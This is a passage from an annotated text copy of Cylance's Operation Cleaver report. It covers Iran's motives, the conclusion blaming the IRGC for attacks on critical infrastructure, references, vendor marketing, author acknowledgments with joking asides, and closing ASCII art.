Iran signed an extensive technology cooperation agreement with North Korea, which allows for
collaboration on a variety of efforts including IT and security [6].
  2742.  
  2743. Cyber Moving to Physical
  2744.  
Operation Cleaver’s carefully selected targets, such as the oil and gas industry, energy and utility
companies, and airlines and airports, indicate Iran’s desire to gain deep access into the
world’s most critical environments. The end goal of this operation is not known at this time.
  2748.  
  2749. University Recruitment
  2750.  
University student recruitment was hinted at within Operation Cleaver and is consistent with Iran’s
reported history of actively recruiting cyber warriors in the educational space [15].
  2753.  
  2754. Overall, there are many reasons that Iran may be pursuing the targets they did in Operation Cleaver.
  2755. While we may never truly know, it is important to consider all the above and more when trying to
  2756. understand the why.
  2757.  
  2758. [ PG-64 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  2759.  
  2760.  
  2761.  
[ Title-page art: CONCLUSION ]
  2825.  
  2826. [ PG-65 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  2827.  
  2828.  
  2829.  
  2833. CONCLUSION
  2834.  
  2835. After tracking the Operation Cleaver team for over two years, we’re led to the inexorable conclusion:
  2836. the government of Iran, and particularly the Islamic Revolutionary Guard Corps (IRGC), is backing
  2837. numerous groups and front entities to attack the world’s critical infrastructure.
  2838.  
  2839. As security experts in Critical Infrastructure and Key Resources (CIKR), Industrial Control Systems (ICS),
  2840. Supervisory Control and Data Acquisition (SCADA) systems, Building Management Systems (BMS),
embedded systems and fixed-function systems, we know how easy they are to hack. We have worked with
countless customers and vendors throughout the years to notify them of vulnerabilities, assist with
remediation efforts, and help mitigate threats to their environments.
  2844.  
  2845. Unfortunately, many critical infrastructure organizations are unable to secure their complex
  2846. environments against modern attacks. They fall victim to the “glue flu”, a malaise of feeling stuck,
  2847. not wanting to change the status quo for fear they will find problems that they have no idea how to
  2848. prevent. This “security anaphylaxis” spells real disaster.
  2849.  
  2850. If Operation Cleaver doesn’t get the world to wake up to what is happening in the silent world of
  2851. cyber, then perhaps nothing will. Prevention is everything and we should never give up until it’s achieved.
  2852.  
  2853. Challenge your trusted advisors. Challenge your security vendors. Demand better technology and services
  2854. to detect, respond, but most importantly PREVENT not just contemporary attacks, but future exotic attacks
  2855. that have yet to be imagined. That is what truly disruptive and innovative technology is. Don’t settle
  2856. for anything less.
  2857.  
We hope that by exposing the Operation Cleaver team to the world, current global critical infrastructure
victims can be notified and future victims spared the consequences of “status quo”
security. Unlike United Flight 811, perhaps we can prevent the next disaster.
  2861.  
  2862.  
  2863. DEFENDERS, NEVER GIVE UP!
  2864.  
  2865. [ PG-66 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  2866.  
  2867.  
  2868.  
  2872. REFERENCES
  2873.  
[1] “Aboard Flight 811: Passengers’ Routine Dissolves Into Terror” - February 1989
http://www.nytimes.com/1989/02/26/us/aboard-flight-811-passengers-routine-dissolves-into-terror.html
  2876.  
[2] “Forget China: Iran’s Hackers Are America’s Newest Cyber Threat” - February 2014
http://complex.foreignpolicy.com/posts/2014/02/18/forget_china_iran_s_hackers_are_america_s_newest_cyber_threat
  2879.  
  2880. [3] “Developments in Iranian Cyber Warfare 2013-2014” - August 2014
  2881. http://www.inss.org.il/uploadImages/systemFiles/SiboniKronenfeld.pdf
  2882.  
  2883. [4] “Iran ups cyber attacks on Israeli computers: Netanyahu” - June 2013
  2884. http://uk.reuters.com/article/2013/06/09/us-israel-iran-cyber-idUKBRE95808H20130609
  2885.  
  2886. [5] “Iranians hacked Navy network for four months? Not a surprise.” - February 2014
  2887. http://arstechnica.com/information-technology/2014/02/iranians-hacked-navy-network-for-4-months-not-a-surprise/
  2888.  
  2889. [6] “Iran and North Korea Sign Technology Treaty to Combat Hostile Malware” - September 2012
  2890. http://www.v3.co.uk/v3-uk/news/2202493/iran-and-north-korea-sign-technology-treaty-to-combat-hostile-malware#
  2891.  
  2892. [7] “Iran’s Paramilitary Militia Is Recruiting Hackers” - January 2011
  2893. http://www.forbes.com/sites/jeffreycarr/2011/01/12/irans-paramilitary-militia-is-recruiting-hackers/
  2894.  
[8] “The Iranian Nuclear Weapon” - January 2014
http://webcache.googleusercontent.com/search?q=cache:eJbMz7vynpQJ:iranredline.org/index.php%3Fid%3D22+&cd=1&hl=en&ct=clnk&gl=us
  2898.  
  2899. [9] “HPSR Threat Intelligence Briefing Episode 11, February 2014” - February 2014
  2900. http://www8.hp.com/h20195/v2/getpdf.aspx/4AA5-1589ENW.pdf?ver=1.0
  2901.  
  2902. [10] “Intel boss’ warning on cyber attacks no joke, say experts” - November 2014
  2903. http://www.foxnews.com/world/2014/11/23/intel-boss-warning-on-cyber-attacks-no-joke-say-experts/
  2904.  
  2905. [11] “Khamenei controls massive financial empire built on property seizures” - November 2013
  2906. http://www.reuters.com/investigates/iran/#article/part1
  2907.  
  2908. [12] “Treasury Targets Assets of Iranian Leadership” - June 2013
  2909. http://www.treasury.gov/press-center/press-releases/Pages/jl1968.aspx
  2910.  
  2911. [13] “Internet Censorship in Iran”
  2912. http://en.wikipedia.org/wiki/Internet_censorship_in_Iran
  2913.  
  2914. [14] “Iranian Internet - Fact and Faction”
  2915. http://surveillance.rsf.org/en/iran/
  2916.  
  2917. [15] “Iran readying hacker attacks on U.S. infrastructure, specialists say” - April 2012
  2918. http://www.washingtontimes.com/news/2012/apr/25/iran-readying-hacker-attacks-us-infrastructure-spe/?page=all
  2919.  
  2920. [ PG-67 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  2921.  
  2922.  
  2923.  
  2926. ABOUT CYLANCE
  2927.  
In the face of growing and evolving threats, traditional cyber protection technologies are now widely
considered inadequate. The only way to regain the upper hand against a new generation of attackers is
to embrace something entirely new. Something that “thinks” like an attacker. Something that doesn’t
rely on a trust model or care about hash lookups. Something with a brain.
  2932.  
  2933. “The world has combated cyber threats by doing the same thing over and over again ... it’s the definition
  2934. of insanity!” Jeff Moss - Co-Chair of the DHS Community Resiliency Task Force & Founder of BlackHat and
  2935. DEFCON security conferences
  2936.  
  2937.  
  2938. Cylance has eschewed the old foundations that existing cybersecurity products are built upon. Instead,
  2939. we’ve based our approach on mathematics, machine learning, and data science. This algorithmic approach
  2940. has been proven to detect – and stop – exponentially more modern threats.
  2941.  
  2942. Leveraging algorithmic risk modeling, CylancePROTECT protects endpoints from everyday viruses, worms,
  2943. trojans, and spyware, but unlike other security products, CylancePROTECT offers true future-proof
  2944. protection against the most malicious threats in the world. Advanced Persistent Threats (APT), 0-days,
  2945. and exotic exploitation techniques are easily detected and halted with little-to-no impact on the end-user.
  2946.  
  2947. Existing reactive solutions rely on a constant stream of signature updates for threat detection,
  2948. which is not only costly and inconvenient, but also requires “sacrificial lambs”. Only after a
  2949. previously unseen threat has inflicted damage can the rest of the industry begin to detect it.
  2950. CylancePROTECT doesn’t require constant updates or even a network connection to protect against
  2951. so-called “previously undetectable” threats. By identifying and defusing attacks in near real time,
  2952. before the attack can execute, we can finally do away with the need for a “patient zero”.
  2953.  
  2954. As Richard Stiennon, Chief Research Analyst at IT-Harvest, put it, “Many vendors are trying to
  2955. solve the endpoint problem, yet Cylance is the only one using the power of math to stop malware
  2956. and with more effectiveness and efficiency than current solutions”.
  2957.  
  2958. Interested in seeing what CylancePROTECT can do for your organization? Contact us!
  2959.  
  2960. Cylance is one of the fastest growing cybersecurity technology firms in the US. Cylance’s flagship
  2961. product CylancePROTECT has been adopted by Fortune 500 companies and government agencies across the
  2962. globe. Cylance was founded by 27-year security industry luminary, Stuart McClure, former Global CTO
  2963. of McAfee, original founder of Foundstone, and lead author of the international best-selling book
  2964. Hacking Exposed. In building Cylance, Stuart brought together the best scientific and executive
  2965. minds from the likes of Cisco, Sourcefire, Google and McAfee. The Cylance board of advisors includes
  2966. former high-ranking officials from the DHS, the FBI, CIA, and executive titans of business.
  2967.  
  2968. [ PG-68 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  2969.  
  2970.  
  2971.  
  2973.  
  2974.  
  2975. CYLANCE PRODUCTS
  2976.  
  2977. CylancePROTECT is the only next generation endpoint security product that applies math to mute
  2978. existing and future malware, viruses, worms, trojans, bots, APTs, 0-days, exploits, adware, spyware
  2979. and hacking tools – without needing any updates or even a connection to the Internet. The technology
  2980. is founded on the principle that to fix the industry, you must start from scratch with a way as yet unseen.
  2981.  
  2982. CylancePROTECT does not rely on signatures of any sort (blacklist or whitelist), behavioral analysis
  2983. using IOCs, sandboxing analysis, heuristics, micro-virtualization, or dynamic detonation to detect
  2984. and prevent malicious files from executing on a target endpoint.
  2985.  
  2986. While every other endpoint security product must collect a sample, analyze, and write a signature to
  2987. detect it, CylancePROTECT can detect malware before it executes by statically analyzing features
  2988. found in the binary itself.
  2989.  
  2990. Features and Benefits of CylancePROTECT:
  2991.  
  2992.  
  2993. *       Near real time detection of malicious files, even if they’ve never been seen in the wild.
  2994. *       Can be used to augment existing endpoint security or be deployed as a complete replacement.
  2995. *       Does not require any signature updates or connection to the cloud.
  2996. *       An easy-to-use web management console with intuitive workflows.
  2997. *       Low-impact endpoint agent.
  2998.  
  2999.  
  3000. For a demo of CylancePROTECT, contact a Cylance expert today!
  3001.  
  3002. [SHINY PRODUCTS!]
  3003.  
  3004. Figure 26: Cylance products detect and stop all the malware used in Operation Cleaver, even though the
  3005. vast majority of the samples are completely missed by the antivirus industry as of this report’s
  3006. publication.
  3007.  
  3008. [ PG-69 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  3009.  
  3010.  
  3011.  
  3013.  
  3014. CYLANCE SERVICES
  3015.  
  3016. Cylance’s Professional Services team is available to assist companies affected by this campaign.
  3017. Cylance is providing consulting to companies that may have been targeted by these advanced threat
  3018. actors. Cylance will perform initial triage in order to determine the extent to which your company
  3019. has been affected by this campaign and work towards establishing a containment strategy.
  3020.  
  3021. Cylance has two tailored offerings for clients affected by this campaign. The first includes
  3022. industrial control systems (ICS) in our incident response, since many of the companies affected are in the
  3023. Critical Infrastructure and Key Resources (CIKR) vertical. The second offering focuses on deploying our
  3024. proprietary tools and methodologies to detect and mitigate the threats posed by Operation Cleaver.
  3025.  
  3026. Option 1: ICS Incident Response & APT Detection and Mitigation
  3027. Option 2: Detection, Remediation, & Mitigation
  3028.  
  3029.  
  3030. For more information on how the Cylance Professional Services team can assess and respond to attacks
  3031. like the ones observed in Operation Cleaver, contact sales@cylance.com today.
  3032.  
  3033.  
  3034. [MARKETING!!!]
  3035.  
  3036. [ PG-70 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  3037.  
  3038.  
  3039.  
  3041.  
  3042.  
  3043. ACKNOWLEDGMENTS
  3044.  
  3045. Brian Wallace <- THIS DOOD ROCKS
  3046. Brian is a Sr. Security Researcher for Cylance who joined shortly after the company was established.
  3047. He is best known for his avid botnet research (often going by “botnet_hunter”) and for his novel malware
  3048. analysis in the A Study in Bots blog series hosted by Cylance. Brian has been a dedicated open-source
  3049. developer as well as an advocate for public and private anti-botnet operations. Brian actively develops
  3050. techniques to counter adversaries in situations where resources and leverage are too limited for
  3051. conventional means. These techniques, cultivated by Stuart McClure, are the Art of Deterrence.
  3052. In a previous investigation, Art of Deterrence techniques were successfully used to divert Indonesian
  3053. hackers motivated by monetary gain away from their highest yielding target group.
  3054.  
  3055. Brian’s botnet research covers a wide range of topics, from using graph analysis to estimate the amount
  3056. of ransom that has been paid to a ransomware operator, to utilizing IPv4 scanning techniques to identify
  3057. and take down point of sale malware panels.
  3058.  
  3059. Stuart McClure <- ALSO ROCKS, PRETTY SURE I MET HIM AT A PENTAGON AFCEA MEETING AND GOT A FREE BOOK
  3060. Stuart is founder, CEO/President and Chairman of Cylance. Widely recognized for his extensive and in-depth
  3061. knowledge of security products, Stuart McClure is considered one of the industry’s leading authorities
  3062. in information security today. A well-published and acclaimed security visionary with currently eleven
  3063. books in print, McClure is the originating founder of the Hacking Exposed series of books, the most
  3064. successful security book ever written. Building on that work, he founded Foundstone in October 1999,
  3065. which was sold to McAfee in 2004.
  3066.  
  3067. McClure brings over two decades of technology and executive leadership with profound technical, operational,
  3068. and financial experience. Besides Foundstone, Stuart held leadership positions at InfoWorld, Ernst & Young,
  3069. Kaiser Permanente and a number of government agencies. At McAfee, McClure held numerous positions including
  3070. SVP/General Manager for the Security Management BU as well as EVP/Global Chief Technology Officer responsible
  3071. for almost $3B worth of revenues. Today, McClure is CEO of Cylance, a disruptive and innovative startup
  3072. applying math to the problem of security. Cylance products such as CylancePROTECT prevent the most advanced
  3073. attacks in the world without signatures or sandboxing, in real time on the endpoint. Cylance Services offer
  3074. highly specialized security services such as incident response, forensics, compromise assessments and
  3075. advanced penetration assessments for global critical infrastructure.
  3076.  
  3077. Cylance Team
  3078. Cylance employees work passionately and tirelessly every day to achieve one goal: Protect the world from
  3079. cyber attacks. And with their efforts in tracking Operation Cleaver, they have achieved that goal. Our
  3080. endless thanks to all the Cylancers who contributed to this report.
  3081.  
  3082. [ PG-71 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  3083.  
  3084.  
  3085.  
  3086. For indicators of compromise GOTO http://jjjjj.us/EJ
  3087.  
  3088.  
  3089.  
  3090.  
  3091. @@@@@@@@@@@@@@@@@@@@@@@@###@@@@(((@@@@@@@@@@@%%#@@@@@@@%###%##%&@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%%%%
  3092. %#####%%#@@&%%@@@@#%%%%%%%%((%#&@@#%%@@@@@#%%%%@@@#@@@@@@@###%#@@@@@@/@&%%@@@@@@@@@@&@@@@@%#@@@%@@%
  3093. (%%%%#@@@@#%@@#%%%%%%%%%%%%(%%(/@@/@/#%/%((/#(@(@@.(,@((&@&(.%%%#@@@@@%@@@@@@@@@@@@@@%%(@@@####@@%%
  3094. #@@@@@@@@@/(((#%%%%%%%%%(%%%%%###%,%%,@%/(/#@/@.@@/*###,%(@/%*/(%@&@%@@@@@@@@@@@@@@%    %%%%%%%%%%%                                          
  3097. @@@@@@@@@@@%%((&%%@#%#@@%&((,*(.%.%,#%%%%%/,,      .,(&%%#((#*.**(@#@@@@@@@@@@@@.        /########%
  3098. @#&(#&(###@###(///@&&(.%.&(%%#&,       .,**//**,.       .#######@@&@&&%             @@@@@&%@@
  3099. %%%%(%%%%%%%%&(((((((.%(( (.%%%.    *#%%%%%%%%%%%%%#%##*(((,    .#(%#(##(/                 @@@@%%#@
  3100. %%%%%%#####%/(#(((((.(.(,%%%    ,%%%%%%%%%#(*/*%%%###%###%%.,(#*    (&                     .&&&&&&&
  3101. (%%%%%%%%(((((%%%%,(((%   ,%%/%@@/#@@@(@@%%%##%%%##%%%%%%%%/%%##.                          %%%%%%
  3102. (((((((((%%#(((&%%%*%%%   ##//%#,.#@@&&@@@/#%%%%%%%%*#//**(         \                     ,%%%%@
  3103. #(#@(####((%((#@(%%%%   ##%%#(#//%&@%%#(/&@###*#%%%%%%%%#%#*         \ji                      .%%##
  3104. %%@@@@@(((((%%#%.@@.  #%%&@&/@&&&%%%%##*%#(*(%%%%%%%%%%%.            /.((                      *###
  3105. #(((((#%%%(##,@(%@  *@@#/((/*%/(%((&/(%##/#%%%%%%@@%&               (,/"(((__,--.               (##
  3106. (#%%%%%%%@,/&%&@(  @&@@@@&%%/#%#/%///@%%%%%%%%@@&(                      \  ) _( /{        ,//***/##
  3107. (####(#%%,.#%&@#  @@@@@@@&&@@&&#,&@&%%%%%#//%%%//                       !|| " :||               ///
  3108. ((((###(&((%*@/  %%%@@%%%%%%%/*/%%%%%%@@%%(/////////(                   !||   :||            ((((((
  3109. ##%%%%#@#*.(#/   %%%%%%&@%%%%/,,%%%%&@@@@@@@@(#@@@@(//                  '''   '''    ,#%%@%%&//%%%%
  3110. ######%@. ,#%   (%%%%%%%%,(&@@@@@&@@@@@@@@@@@/#@    @(%/                        ,  %%%%#((((//////%
  3111. %%%%%%(%.#,%(  (%%///%%#/%%&@@@#@/&@@@@#  /,  ,#    #%(#(                  *(&*#,. %###/(///(//////
  3112. %%%%%%%%  %%  *(%/%%#/%@@&@@&@@@@%@@@@%   /    ..((,../*/              ,((@@@%/%#/ .///%/%(/%%@@@@@
  3113. %%%%%%*%,@%%  ((#(###@@@@@@@&%/&@@@#  *   #   #.        .(         .#@@@%##@#%//  /%%/%/#%%&/@#%&
  3114. %%%%%%%%*%@#  %%%&@%@@@@%%%%&%&%&%%   (   %   (.   ,      (     (#&&%%%%%%%(*%#&/(  (////%%@@/((&@@
  3115. %%%%%%*.%*((  ##%%((@@######%&%%%   #   #    %   *(      / #%%%&@@@%%%%%%%%/####  *//@@@@@@//@@##
  3116. %%%%%%&&(/((  @@%%%#&@%#@@@@@@&   (   #   .*    .#     (@&%%@@@@@%%%%%%%%(%%%/  /%%%%@%@@%/###(
  3117. %%%%%%(&*(((  &@@@&%((((&@@@@@@@@,*   #  .%#((.  .#        &@@@@@@@@@@@%%%%%%%%%%%  %%%%%%%%%@/%@@@
  3118. %%%%@@/#@@*@  /@@@%@@#@@@@@@@@@  &@,        /         ,@@@@@@@@@@@@@%@@@/%%%%( .%%%%%%%%%%%%%%@
  3119. %%%@@@@, &@@(  &@@@@%@@@@@#(%&/(% (*          (.          (#/((@@@@@@@@%&&(%%%%. %#%%%%%%%@%%&@@@
  3120. %%@&@@@,@,@%@. ,@@@@%@@@@(((%&@#            .%          /#%%%%%%/&&&@@@@@@#(#&/  @(#%%%%#(#%%%%@@
  3121. %%%&%@@@,@&&@@  @@@@@#@@@&@@%            .%%%,        *# /#%#%##%(#@@@@@@@@%%,%%  (@##%%%%%%%#@
  3122. %%%%#@@@@**%/  @@@@%#@@@@@,          /.  *%       (/  #%%###%@@@(@@@@@@%(/(%(  ,%%%%%#%%%%%%%%%%%
  3123. %%%%%%%%%%%.%,@#  @@@@@&@@@@&       .(       #    (/   ###%%%##%%%@@@@&%/*/,/(  *%%#%#%%%%%@@%%%%%%
  3124. %%%&@@#@@%## (%%(  @@@@%@@@@@%   .(%    ###(,         %%%%%%%%%%%/%%%@%/*&&@&  ,%%%%#%%#%%%%%%%%@@%
  3125. %%%%%#@@%@@%,/@*%#  %@@@@%@@@@@@&@@@&%               %%%%%%%%%%%%%#%%%%(#%%/  ,%%%%%#@@@@@@@@@@@@@@
  3126. %@@&%%%%%%%%@@%,/((,  (##%#%&@@@@@@#(#              .%%%@%%%%%%%%%/#/%@@@%   %%%%%%@@@@@@@@@@@@@@@@
  3127. %##%%%%%%@@%#*#* (&%(   #%#*&@@@@@#@@@              .%%%%%#(((%%%%%####%   ###%%%%@@@@@&@@@@@@@@@@@
  3128. %%%%%%%%%@%(#@%@**(.(%%   (#((#**#@@@&              .#######/########(   *%%%@&%&&@@&@@@@&@@@@@@@@@
  3129. %%%%%%%%%###@@@@ .(.@#@@@   .#/(%@@@&&              .%####%########,   (%@#@#@@@@@%@@@%%@@@@@@@@@@@
  3130. #%%%%@@@@@@@@##((@,@*(,(/%%.   ,&/&%##              .###########,   .##&@%@@@@@@@%@@&@&@@@@@@&%%@@%
  3131. #@@@@@@@@@@(@@@@@@@%@.#,%.((%%#     ,(              .##%#%%*    .#%%%%%%#@@@%@@%@@@@@@@@@@@@@@@@@@@
  3132. @@@@@@((((((@@@@@@@@((#@/, (*(%%%%&.                         &%%%%%%%&@@%#@&@@@@@@@@&@@@@@@@@@@@@@@
  3133. @@@@@@%%@@(@@@@@@@(((%%%%%%%* %.%,%%%%               ##////%&/%&@@%@%@@%&%&@@@@&&&@&@@@@@@@@@@@@@@@
  3134. &@@(%@@@@@@@@@@@%@%%%%%((%%%%%/#,%%%%%              /////////@@@@@@@@@@@@@@@@@@@@@#%((@@@%@@@#@@@@@
  3135. ((((%#@@%@@%##@@#%((%(%((#/////////#&/         ./&%%&&&/@@@@@@@@@@@@@@@@@@@@&@@@@@@@@@@(%%#%%%%%%%%
  3136. (###%%%%%@@%@%%%#@@%###%#/////%//@@&(/     (   ./&%%%%&@@@@@@%&/@@((/@@@@@###%@%@@@@@#%@@@@@@#@@%%%
  3137. (%%%%%%%%%%%##@@@#%%%%&&&&&&@/@@@@@/@#.%&&(/   ,&/%%%%%%@@@@@///%%////(@%%%%%%%%@@@%%@@@@@@@@@@%%%%
  3138. #@@%%%%%%%%%%%%%%%@@@@@@@@@@@@@@@@@&%%%%%%%%   .%@//(////////////////////@&%@%@@/@###%%%%((((((%%((
  3139. %%%%%%%%%%%%%%%@@@@@@@@@@@@@@/@@@@#%%%%%%%%%   ,@@@@&%@@@%//%////%/%%%%/@#@@@@@/@//@@@/%%%%%(((((%@
  3140. %%%%%%%%%%(%@@@@#%#(#((((@@(%%%%%%%%%@#@@     (@@@@@@@%@#@&%%%@@@@@@@@%&@@@@@///@@@#%%%(#%%%(#%%%
  3141. #%%%####(%%%@@@@(%(%(((((((((##%%%%%@@@@@@#******%&%%&&%&@@@@@@@@@@@@@@@@%%&@@@@@@@%%@%%@%%%%%%(%((
  3142. (%((%@##@@@%%((%%((((((((#####(&%%#@%#%%@@%%% (##@%%%%%%%&@@@@@@@@@@@@@@@@@@@@%@@@&&@%@@@@@@@@%%@((
  3143. (((((%%%@@%#((#%%%%@((((((%%#(#%%%%%%(((%,       .%%%%%%@@@@@@@@@@@@@@@@@@@@@@%@@@@@@@@@@@@@@@@@@@@
  3144. (((#((((%((%%%@@#@@@((((((@@%(%(%%%@@%%((         *@@@%&@@@@@@@@@@#@@@#%@@@@@@@@@@@@@@@@@@@@@@@@@@@
  3145. ##((#(###(@@@@@@@@@@@@#((@@%%%%%%%%%%%%((         ,@@#@@@@@@@@@@@@%@@@&%%#@@@@@@@@@@@@@@@@@@@@@@@@@
  3146. %%%%%%%%%%#@@@%@@%@@@#(%%%(##%%#(##%%((((         ,@&@@@@@@@@@@@@@@@&&@%@@@@%%@@@@@@@@@@@@@@@@@@@@&
  3147. @@@@@@@@@@@&@@@@@%%&@%@(((%%%%%%((((((((%     ... ,@@@@@@@@@@@(#%%%%%%#%%%%%%@#@%%%%%((%@@@@@@@%%%%
  3148. @@@@@@@@@@@@@@@@@@#(@@@@@(%%%%%((((%%((((((      @@@@@&%&@@@#(#%%%%%%%%%%#@@@@#%%%%%%%%%%%%##@@@(%%
  3149. %@@&%@@%%%@@@@@@%@(((((@((((#((#(%%%%%%%%%(      @@@&%%%@@@@%%%%@@%%%%#&%%%@&%%%%%%%%%%%%%((%%%%%%%
  3150. //#(%%%%%@@@@%%(((((((((((((((((%(#%%%##(##..,,, @@@&%@@@%%@@@@@@@%%%%%%%%%%%%%%%%@%%%%%%%((%%@@@%@
  3151. /#((/#%#(%%@(((%(%%%%%((((((#(((%%%%#(((%//..*** @@@@@@@@@#%%@%%%%%%%%%%%%%%@#%%%%%%%((((((((((((((